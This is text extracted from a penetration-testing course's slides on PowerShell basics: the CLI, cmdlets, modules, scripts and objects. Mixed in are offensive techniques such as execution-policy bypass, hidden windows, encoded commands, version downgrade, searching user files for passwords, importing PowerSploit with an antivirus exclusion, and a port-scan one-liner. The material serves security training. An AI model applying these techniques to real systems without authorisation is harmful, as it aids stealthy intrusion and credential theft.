2.

1 The PowerShell CLI

2.2 Cmdlets

2.3 Modules

2.4 Scripts

2.5 Objects
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
By the end of this module, you should have a better understanding of:

✓ The PowerShell Command line interface (CLI) and accessing

various cmdlets and Modules.

✓ Some of the more common PowerShell features and

components as they relate to Penetration Testing.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
 For our first task, we should become familiar with the PowerShell
Command Line Interface (CLI).

http://radar.oreilly.com/2013/06/powershell-command-line-introduction.html

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The PowerShell CLI provides us with access to built-in cmdlets,
modules, functions, features, and provides a way to create tasks,
functions, variables interactively, and more, directly from the CLI.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

In most cases, accessing the CLI is as
simple as just typing “powershell” in the
Windows search field from the Start Menu.

Alternatively, the shortcut to PowerShell

can be found within the
“%appdata%\Microsoft\Windows\
Start Menu\Programs\Windows
PowerShell” directory.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

In this case, the shortcuts are unavailable; the PowerShell
executable itself can found in the
“C:\Windows\System32\WindowsPowerShell\v1.0”
directory.

If other versions are available on the

system, they can be found in their
corresponding version paths.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

A note regarding 32-bit and 64-bit PowerShell executables:

If you’re operating on a 64-bit system, the location of the 64-bit

PowerShell executable can be found in
C:\windows\system32\WindowsPowerShell.

While the 32-bit version being located in the

C:\windows\SysWOW64\WindowsPowerShell directory.

This can be a bit confusing considering the directory naming

convention.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

A note regarding 32-bit and 64-bit PowerShell executables:

Nonetheless, we can determine whether we’re running in a 32-bit

or 64-bit PowerShell environment from the CLI with the following
command:
PS C:\> [Environment]::Is64BitProcess

Which should return “True” if the current PowerShell process is

64-bit:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

A note regarding 32-bit and 64-bit PowerShell executables:

On a 32-bit system, the executable will be in its usual location of:

C:\Windows\System32\WindowsPowerShell\*

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

When possible, we should try and
launch PowerShell as the
Administrator user as this will give us
access to functions which we would
be otherwise unable to access as a
Lower-Privileged user.

We can right-click on the Shortcut or

Executable, and select “Run As
Administrator.”

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

NOTE

Although our examples are shown on Windows 10, all of the steps
will be similar for Windows 7 and other versions of Windows,
unless otherwise noted.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Once we launch
PowerShell,
we’re presented
with the familiar
blue console.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Like most other
programs found
on Windows, the
PowerShell
executable has its
own set of
command line
options. We can
view these
options with the
usual “/?” help
parameter:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

These options can alternatively be shown with the “-Help”
parameter or “-?” as well and will be most useful when we’re
calling PowerShell from a standard Windows command prompt.
(cmd.exe)

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 The following are some of the more common PowerShell.exe command line
parameters we will use for our purposes:

-ExecutionPolicy

The PowerShell execution policy determines which scripts if any, we can run and
can easily be disabled with the “Bypass” or “Unrestricted” arguments.

C:\> powershell.exe -ExecutionPolicy Bypass .\script.ps1

C:\> powershell.exe -ExecutionPolicy Unrestricted .\script.ps1

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

-WindowStyle

The -WindowStyle parameter hides the Powershell window

when used with the “hidden” argument.

C:\> powershell.exe -WindowStyle Hidden .\script.ps1

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 -Command

The -Command parameter is used to specify a Command

or Script Block to run.

C:\> powershell.exe -Command Get-Process

C:\> powershell.exe -Command “& { Get-EventLog –LogName security }”

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_script_blocks?view=powershell-6

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

-EncodedCommand

The -EncodedCommand parameter is used to execute base64

encoded scripts or commands.

C:\> powershell.exe -EncodedCommand $encodedCommand

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

-NoProfile

Don’t load any powershell profiles.

Profiles are essentially scripts that run when the powershell

executable is launched and can interfere with our operations.
C:\> powershell.exe -NoProfile .\script.ps1

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 -Version
We can use the -Version parameter followed by a version number
as the argument to downgrade the version of PowerShell.
• Useful in scenarios where you’ve landed on a machine with a
more recent version and need to downgrade to Version 1.0 or
2.0 or to complete certain tasks.
• Requires that older versions are still installed on the target.

C:\> powershell.exe –Version 2

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Furthermore, all of the PowerShell.exe command line parameters,
as well as their arguments, can also be abbreviated, as long as the
abbreviations are unique, and additionally, are not required to be
case-sensitive either:

-ExecutionPolicy Bypass -EncodedCommand -WindowStyle Hidden

powershell.exe -ep Bypass powershell.exe –enco powershell.exe –W h

powershell.exe -ex by powershell.exe -ec powershell.exe –Wi hi

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We will cover more of the PowerShell.exe Command Line options
a bit later in modules that follow.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 An extremely useful feature of the PowerShell CLI is the “Get-Help”
cmdlet.

Similar to *nix “Man Pages,” we can call upon the “Get-Help”

command to obtain information related to any function, alias,
module or cmdlet that PowerShell is aware of.

https://technet.microsoft.com/en-us/library/cc764318.aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can do this by including the cmdlet, function or module name
we’re looking for information on, as an argument to the “Get-
Help” cmdlet.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can see here that we’re requesting the PowerShell Help
pages for the “Get-Help” cmdlet itself:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

To get “full” help
PS C:\> Get-Help Get-Process -Full
for any cmdlet,
which includes
detailed
information on
associated
parameters, we
can use the -
Full
parameter:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

And if we’d like to get examples on how to use a specific cmdlet,
we can use the “-Examples” parameter.

PS C:\> Get-Help Get-Process -Examples

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 PS C:\> Get-Help Get-Help -Online
Alternatively, if we want to
get current Help pages from
online for any of the cmdlets
or Functions, we can simply
supply the -Online
parameter to our command
line, and will launch a web
browser to the corresponding
help page:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

If we’d like to update our locally installed help files for PowerShell
via the CLI, we can do so with the “Update-Help” cmdlet:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

More information on using the “Get-Help” cmdlet can be found
here:

https://technet.microsoft.com/en-us/library/cc764318.aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The “Get-Command” cmdlet is another very useful one.

It allows us to list all cmdlets, aliases, functions, workflows, filters,

scripts and any applications that are available for us to use in
PowerShell.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Running the “Get-Command”
cmdlet without arguments will
PS C:\> Get-Command –Name *Firewall*
simply list all commands, but,
we can also use the -Name
parameter to list any that are
useful to us.

For instance, we can list all

functions related to
modification of the Windows
Firewall with the following
command:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
 As we’ve seen in the previous section, cmdlets (“command-lets”)
are a big part of how we will leverage PowerShell for our offensive
purposes, two of which we’ve already briefly covered:
• “Get-Help”
• “Get-Command”

https://msdn.microsoft.com/en-us/library/ms714395(v=vs.85).aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Next, we’ll cover some of the ways we can leverage other useful
cmdlets for our purposes.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 Let’s first generally summarize what cmdlets are:
• Light-weight PowerShell scripts that perform a single function
(Can be as small as a few lines of code).

• Instances of .NET Framework classes derived from the Cmdlet

Base Class and provide access to system functions.

• Cmdlets are native commands in PowerShell (We can also

create our own).
https://msdn.microsoft.com/en-us/library/gg145045(v=vs.110).aspx
https://docs.microsoft.com/en-us/dotnet/api/system.management.automation.cmdlet?redirectedfrom=MSDN&view=powershellsdk-1.1.0
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
 cmdlets summarization continued:

• Typically written in a “Verb-Noun” file name format which

helps us determine their function (e.g., Invoke-Command).

• Typically used to return output to other Cmdlets to be then

processed via a pipeline (|).

https://www.petri.com/understanding-the-powershell-pipeline

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Every cmdlet has its own set of parameters which can be
discovered through the Get-Help cmdlet as we’ve seen previously.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 IMPORTANT

It should be noted that most cmdlets, by default, when run

without other parameters will return a limited set of information
or “Columns.”

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

For example, just running the “Get-ChildItem” cmdlet without any
other arguments or options, returns four columns named “Mode,”
“LastWriteTime,” “Length” and “Name”.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 PS C:\> Get-ChildItem | Format-List *
But by piping the
output of a cmdlet
to the “Format-List”
cmdlet, rather than
columns and names
as seen in the
previous slide, we
can return all
named properties
associated with its
objects in a different
list-like format,
https://technet.microsoft.com/en-us/library/hh750381.aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

These names whether in list format or the default column format
are important, as we can use those to filter the output of cmdlet
objects for specific properties, as we’ll see shortly.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 The results of all cmdlet output, are usually referred to as
“objects.”

These objects can be further processed using what is known as

“pipelining,” similar to how we can chain commands together in a
Linux bash shell for instance with the Pipe Operator (|).

https://www.petri.com/understanding-the-powershell-pipeline

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

An example of this processing of cmdlet output objects with
pipelines would be something like the following:

PS C:\> Get-Process | Sort-Object -Unique | Select-Object ProcessName

The above returns a list of processes (Get-Process), then sorts

the list (Sort-Object) with the (-Unique) parameter, and
finally, selects the “ProcessName” objects (Select-Object
ProcessName) and returns a unique list of process names.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

PS C:\> Get-Process | Sort-Object -Unique | Select-Object ProcessName

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can also redirect the results of our pipeline operation to a file
using a standard Redirect Operator (>):
PS C:\> Get-Process | Sort-Object -Unique | Select-Object ProcessName > uniq_procs.txt

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Let’s now examine several examples of Cmdlet usage we’ll find
useful for our work.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The Get-Process cmdlet will give us a listing of all processes, as we
saw in a previous example.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Running the “Get-
Process” cmdlet
without any
arguments returns
basic information
as we can see,
and is formatted
in a table-like
format, which
includes column
names
(properties).

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 PS C:\> Get-Process | Format-List *
To get all of the
information (properties)
associated with all of
the processes, we can
pipe it to the “Format-
List *” cmdlet and
wildcard argument.

This will give us a better

idea of how we can
filter the data for
specific properties.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 We can further extend this to get information about specific
processes and paths to their executables (in this example, Chrome
and Firefox), by using the “Format-List” cmdlet and also specifying
the “Path” property name.
PS C:\> Get-Process chrome, firefox | Sort-Object -Unique | Format-List Path

https://github.com/rebootuser/LinEnum

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 We can also append multiple property names to the Format-List
cmdlet, and obtain the processes Paths, and associated PID’s (Id)
for instance:
PS C:\> Get-Process chrome, firefox | Sort-Object -Unique | Format-List Path,Id

https://github.com/rebootuser/LinEnum

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Something that’s good to know about cmdlets is that most of them have “Aliases.” For
instance, the “Get-ChildItem” cmdlet which simply lists items in a directory, can be
alternatively called by issuing the “ls” command, which is an alias for the Get-ChildItem
cmdlet.

We would get the same exact results by simply just running “Get-ChildItem.”

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

To find what the aliases are for a specific cmdlet, we can use the “Get-
Alias” cmdlet with the “-Definition” parameter followed by a cmdlet
name, like in the following example:
PS C:\Users> Get-Alias -Definition Get-ChildItem

As we can see, the “Get-ChildItem” cmdlet has three aliases, “dir,” “gci,”
and “ls.”
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Another alias you’ll see quite often is “select” when used in
conjunction with other cmdlets in pipeline operations, and is an
alias for the “Select-Object” cmdlet.

In this example, we’re using the “Get-WmiObject” cmdlet, (used to

return information about WMI objects) in conjunction with the “-
class win32_operatingsystem” parameter and arguments, and then
selecting (select) all (*) properties related to that WMI object class;
this returns all information related to the current operating system.
PS C:\> Get-WmiObject -class win32_operatingsystem | select -Property *

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

PS C:\> Get-WmiObject -class win32_operatingsystem | select -Property *

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 PS C:\> Get-WmiObject -class win32_operatingsystem | fl *
Alternatively, we
could use the
Format-List alias
“fl” with the
wildcard argument,
and obtain the
same list of all
properties for the
WMI Object:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can use the PS C:\> Get-WmiObject -class win32_service |Format-List *
Get-WmiObject
cmdlet to obtain
information
regarding any WMI
Class, for instance,
getting a detailed
list of properties
for all services with
the
“win32_service”
class:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

And we can further extend our pipeline and filtering operation just to
give us “PathName” which includes command line arguments and paths
to all service executables:
PS C:\> Get-WmiObject -class win32_service |Sort-Object -Unique PathName | fl Pathname

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

And of course, saving the information we’re gathering to a file is
important as well. We can either redirect the output of the
pipeline operation to a file with the (>) Redirect Operator as we
saw in an earlier example or sometimes, we may need the results
in a different format for processing.

For this, we can pipe all of the output to the “Export-Csv” cmdlet,
and save the results in CSV format:
PS C:\> Get-WmiObject -class win32_operatingsystem | fl * | Export-Csv C:\host_info.csv

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

For access to Windows Registry hives, PowerShell provides a
convenient method with the following command:
PS C:\> cd HKLM:\

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can easily navigate into areas we might be interested in with
“cd,” which is the alias for “Set-Location,” and furthermore, list the
contents of our current hive with “Get-ChildItem” cmdlet or “ls”:
PS HKLM:\> cd .\SOFTWARE\Microsoft\Windows\CurrentVersion\
PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\> ls

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The Select-String cmdlet along with the “-Path” and “-Pattern” arguments is yet
another useful PowerShell command we can use to scour the system for files
containing certain strings.

In the example below, we search for files of a .txt extension within a user's
“Documents” directory, containing the string “pass*” in their contents:
PS C:\> Select-String -Path C:\users\user\Documents\*.txt -Pattern pass*

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can then use the “Get-Content” cmdlet to display the full
contents of the “passwords.txt” file.

PS C:\> Get-Content C:\Users\user\Documents\passwords.txt

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Alternatively, we can obtain the same results by using the “Get-ChildItem” cmdlet
alias with the recurse parameter (ls -r) which lists files within a directory recursively,
then, search for files types of .txt with the “-File” parameter. We’ll then pipe that to
the “ForEach-Object” alias which is (%) and a script block {} that searches for the
string “pass*” in all files in the path specified with the alias for the “Select-String”
cmdlet (sls): Variable for current
value in the pipeline ($_)

PS C:\> ls -r C:\users\user\Documents -File *.txt | % {sls -Path $_ -Pattern pass* }

Alias for “ForEach-Object” Alias for “Select-String”

We will learn more about how we cmdlet (%) cmdlet (sls)
can use the “ForEach-Object”
cmdlet a bit later for certain tasks.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The “Get-Service” cmdlet will get us information regarding
currently installed services and can be useful in the case we can
identify a service which might be vulnerable to a privilege
escalation exploit.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 PS C:\> Get-Service

Running it
without
parameters or
arguments
simply returns a
three column
list of all
services.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can extend
those results, as PS C:\> Get-Service “s*” | Sort-Object Status -Descending

we’ve seen
before, with the
“Sort-Object”
cmdlet. In this
example, all
services starting
with “s*” in
descending order
and sorting by
the “Status”
property.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
As we can see, there are many ways and variations of using
cmdlets, pipelines and aliases we can leverage to conduct tasks
that are relevant to our objectives, and different ways to craft
commands we can use to achieve similar results.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
 A module, in simplest terms, is a set of PowerShell functionalities
grouped together in the form of a single file that will typically have
a “.psm1” file extension.

https://msdn.microsoft.com/en-us/library/dd878324(v=vs.85).aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Modules are typically comprised of several components.

However, not all components are necessary for the

functionality of a module.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 The components that can make up a typical module are:
• Any number of powershell scripts (.ps1) or other code files,
such as a managed cmdlet assembly.

• Additional Assemblies, Help files, or scripts.

• A module manifest file.

• A directory which is used to contain all of the above.

https://msdn.microsoft.com/en-us/library/dd878337(v=vs.85).aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 There are also several different types of modules:
• Script Modules (We’ll be working with these for the most part)

• Binary Modules

• Manifest Modules

• Dynamic Modules (Created dynamically by scripts using the

“New-Module” cmdlet)
https://msdn.microsoft.com/en-us/library/dd878340(v=vs.85).aspx https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/New-Module?view=powershell-5.1
https://msdn.microsoft.com/en-us/library/dd878342(v=vs.85).aspx https://msdn.microsoft.com/en-us/library/dd878337(v=vs.85).aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Modules are typically “imported” into the current PowerShell
session. To obtain a list of all currently imported modules, we can
use the “Get-Module” cmdlet. In the example below, we can see
all of the currently imported modules for the current PowerShell
session.
PS C:\> Get-Module

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can also list all modules available to us for importing with the
“-ListAvailable” parameter, which returns a long list of available
modules.

PS C:\> Get-Module -ListAvailable

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 PS C:\> Get-Module -ListAvailable

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 As we’ve mentioned, modules that we want to use,
will first need to be imported into our current
PowerShell session. This, can be done with the
“Import-Module” cmdlet, as follows:
PS C:\> Import-Module .\module.psm1

https://github.com/rebootuser/LinEnum

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Once we import a PowerShell module, all of its
various cmdlets and other components become
available to us, and we can simply then execute the
cmdlets that are part of the module.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

As an example, let’s take a quick look at the popular
PowerShell exploitation framework “PowerSploit”,
and how we would go about importing all of its
functionality into our current PowerShell session.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Its usage and installation is straightforward, and we should
be able to get it up and running in just a few steps.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

First, we download the PowerSploit package to our local machine from
the following location:

https://github.com/PowerShellMafia/PowerSploit/archive/master.zip

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The PowerSploit modules will need to be copied into one of the module
paths specified by the “$Env:PSModulePath” PowerShell environment
variable. To find these paths, simply type the above into your PowerShell
Console:
PS C:\> $Env:PSModulePath

For our purposes, we’ll use the local users module path, which
is in:
C:\users\user\Documents\WindowsPowerShell\Modules

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We’ll need to then create a “PowerSploit” folder
in our chosen Modules directory, where we will
copy all of the contents of the PowerSploit
archive into.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Important note on PowerSploit and Antivirus

Many exploitation frameworks, will be detected as “hacking tools” and

other signatures by a number of Antivirus solutions. This is somewhat
“normal”, it’s Antivirus just doing its job, in this case, at detecting strings
within the powershell scripts as being malicious, or flagging on names of
modules, etc. Either way, you can create an exclude directory for your AV
software for the purpose of this lesson, and download the modules into
that directory for now.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Once we’ve downloaded the PowerSploit
archive, extracted it and copied all of its
contents into our chosen module directory
into a folder called “PowerSploit”, we can
then launch a PowerShell console.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can then import all of the PowerSploit modules into our
current session with the Import-Module cmdlet, and if we run
the “Get-Module” cmdlet, we can see it’s now included in our
list of currently imported modules.
PS C:\> Import-Module PowerSploit

PS C:\> Get-Module

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

To list all of the PowerSploit associated cmdlets (of which there are many), we
can use the “Get-Command” cmdlet, and specify the PowerSploit module with
the –Module parameter:
PS C:\> Get-Command -Module PowerSploit

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Furthermore, there are help files for all of the modules. For help on a
specific PowerSploit cmdlet, we simply run the Get-Help cmdlet, for
instance, getting help on the “Write-HijackDLL” PowerSploit cmdlet:
PS C:\> Get-Help Write-HihackDLL

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We will cover other modules we can use for
our offensive purposes in sections that follow.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Scripts are another element of our leveraging of PowerShell as an
offensive tool, and most of the time, this is probably the most
common way we will utilize PowerShell for most tasks.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

PowerShell Scripts are usually identified by the “.ps1” extension,
the “1” indicating not the version of PowerShell, but rather the
PowerShell engine.

For the most part, we’ll be dealing with the .ps1 file.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

PowerShell scripts can contain as little as a few commands to
automate some tasks or be as complex as to contain parameters,
script arguments, loops, functions, and anything else related to the
capabilities that PowerShell offers as a scripting language.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 Running a powershell script is as simple as calling it from the
powershell console, using the (dot-backslash) .\ notation for a
script in our current directory*.
PS C:\> .\example.ps1

* You may have to bypass the current execution policy (as shown earlier) before you execute the script of your choosing.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

A very basic example of a PowerShell script which takes a file name
as an argument would be something like the following:
example.ps1

The above script simply takes a file name as an argument for which
it creates a variable called “$file,” and runs the “Get-Content”
cmdlet on our variable.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Now if we run this file while supplying the name of a file, in this
case, “users.txt” which contains several usernames, we can see
what happens:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

If we run the script without arguments, PowerShell will ask us for
the file, since “mandatory=$true” has been set for the parameter
function in our script:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

At which point, we provide our file name, and the script works as
intended, returning to us the contents of the users.txt file.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Alternatively, in regard to the example on the previous slide,
rather than writing a .ps1 script file, we could also just create a
variable “$file” for our users.txt file, and then call the “Get-
Content” script against our variable, directly from the shell:
PS C:\Users\user\Desktop> $file=“users.txt”
PS C:\Users\user\Desktop> Get-Content $file

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

PowerShell supports several “loop statements” which we can
utilize for different tasks.

As we saw with a previous example of the “ForEach-Object”

cmdlet, we can use loop statements to iterate through files,
PowerShell object collections, and even conduct port scans which
we will cover in this section.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

A “loop” is a programming or scripting function which iterates a
statement, or condition based on specific boundaries.

In other words, a loop will repeatedly execute code in its body until
a conditional statements returns “False” or, returns no additional
data.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

PowerShell allows us to use a number of loop statements for our
purposes:

• for()
• foreach()
• while()
• do {something} while()
• do {something} until()

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

And as we can with mostly everything in PowerShell, we can get
help on any of those statements with the “Get-Help” cmdlet:
PS C:\> Get-Help about_Foreach
PS C:\> Get-Help about_For
PS C:\> Get-Help about_Do
PS C:\> Get-Help about_While

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Loops are generally divided into two parts, a loop statement, and a
loop body and will also contain variables as seen in the example
below:
Loop Statement Loop Body

PS C:\> $services = Get-Service

PS C:\> foreach ($service in $services) { $service.Name }

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 Loop Statement Loop Body

PS C:\> $services = Get-Service

PS C:\> foreach ($service in $services) { $service.Name }

In the first line, we’re creating a variable called “$services” which will return the
Get-Service objects collection as a result of running the “Get-Service” cmdlet.

We then use the “foreach()” loop statement to create a new variable “$service”
to contain each resulting object of the $services variable, and finally, we’re
telling PowerShell to return the name of each $service with the “.Name”
property in the loop body, between the {} brackets.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
 Furthermore, we can use several
built-in cmdlets for constructing
loop statements, specifically the PS C:\> Get-Service | ForEach-Object {$_.Name}
“ForEach-Object” and “Where-
Object” cmdlets.

The previous example could be

similarly accomplished by using
the “Get-Service” and “ForEach-
Object” cmdlets and pipeline, as
follows:
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/foreach-object?view=powershell-6
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/where-object?view=powershell-6
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
 The “Where-Object” cmdlet allows us to select objects within a collection based on their
property values in regards to when used for a loop. In the following example, we’re using the
“Get-ChildItem” cmdlet to list the contents of a “Powershell” directory, while piping that
output to the “Where-Object” cmdlet with the -match parameter to only return files that
contain “xls” within their name:
PS C:\> Get-ChildItem C:\Powershell\ | Where-Object {$_.Name -match "xls"}

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/where-object?view=powershell-6

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

A great example of a useful loop which the uses the “foreach”
statement, is a TCP Port Scanner we can create entirely via the
shell as a one-liner:
PS C:\> $ports=(81,444);$ip="192.168.13.250"; foreach ($port in
$ports) {try{$socket=New-Object
System.Net.Sockets.TcpClient($ip,$port);} catch{}; if ($socket -eq
$null) {echo $ip":"$port" - Closed";}else{echo $ip":"$port" -
Open"; $socket = $null;}}

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 We can just as well put the contents of the above, into a “Scan-
Ports.ps1” file in this case, for easy execution:
Define $ports
and $ip variables

PS C:\Users\user\Desktop> .\Scan-Ports.ps1

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Objects are essentially a representation of data that is provided as
a result of running a cmdlet.

Rather than with other scripting languages where data is output as

text most of the time, PowerShell is different in that the data being
output originates from classes within the .NET Framework in the
form of “objects.”

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Objects are partly comprised of collections of properties, along
with “methods” that we can use to manipulate the objects.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Let’s take the Get-Process cmdlet as an example.

When we run the Get-Process cmdlet along with the “Format-List

*” command, as we’ve seen earlier, we get a list of all processes
along with their properties.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

If we take a look
at the “firefox”
process object
for example, we
can see it
contains a
number of
different
properties,
(Name, Id, Path)
to name a few.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Each of the objects also has multiple methods that we can use to
manipulate a particular object.

To get a list of methods for objects associated with a cmdlet, we

can use the “Get-Member” cmdlet as part of a pipeline command,
like the following:
PS C:\> Get-Process | Get-Member –MemberType Method

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The “Get-
Member”
cmdlet will give
us an idea of all
of the methods
for associated
objects, as can
be seen below
for the “Get-
Process”
objects.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can see from the previous output, that several methods that
might be of interest to us for the “Get-Process” objects might be,
“Kill,” or “Start,” which we could use to Kill, or Start processes.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 So far:

1. We’ve identified an object (in this case, a process “firefox”) we’d

like to manipulate in some way using the “Get-Process” cmdlet.

2. We’ve determined the methods that are available for use with the
objects that were returned by using the “Get-Process | Get-
Member” cmdlet and pipeline.

3. And we’ve decided that the “Kill” method is the method we’d like
to use for that process (as an example).

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The next step is straightforward.

We can simply call the “Get-Process” cmdlet, along with the

“-Name” parameter for the “firefox” process, and pipe that to the
“Kill” method we identified using the “Get-Member” cmdlet.

Our command would like the following:

PS C:\> Get-Process –Name “firefox” | Kill

Which effectively kills any Firefox processes.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

This is just one example of how we can manipulate objects using
their associated methods to help us meet our objectives.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

In addition to using the built-in cmdlets to access a large number
of objects, which we can then manipulate, we can also create .Net
Objects which greatly extends our capabilities using the “New-
Object” cmdlet.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 We can use the “New-Object” cmdlet to create an instance of a
.Net Framework object, or COM object.

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/new-object?view=powershell-6

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

 These can be either created as a “Type” of the .NET Framework
class, using fully qualified names of .NET classes, or, we can use
the “ProgID” of a COM object.

https://msdn.microsoft.com/en-us/library/system.type(v=vs.110).aspx

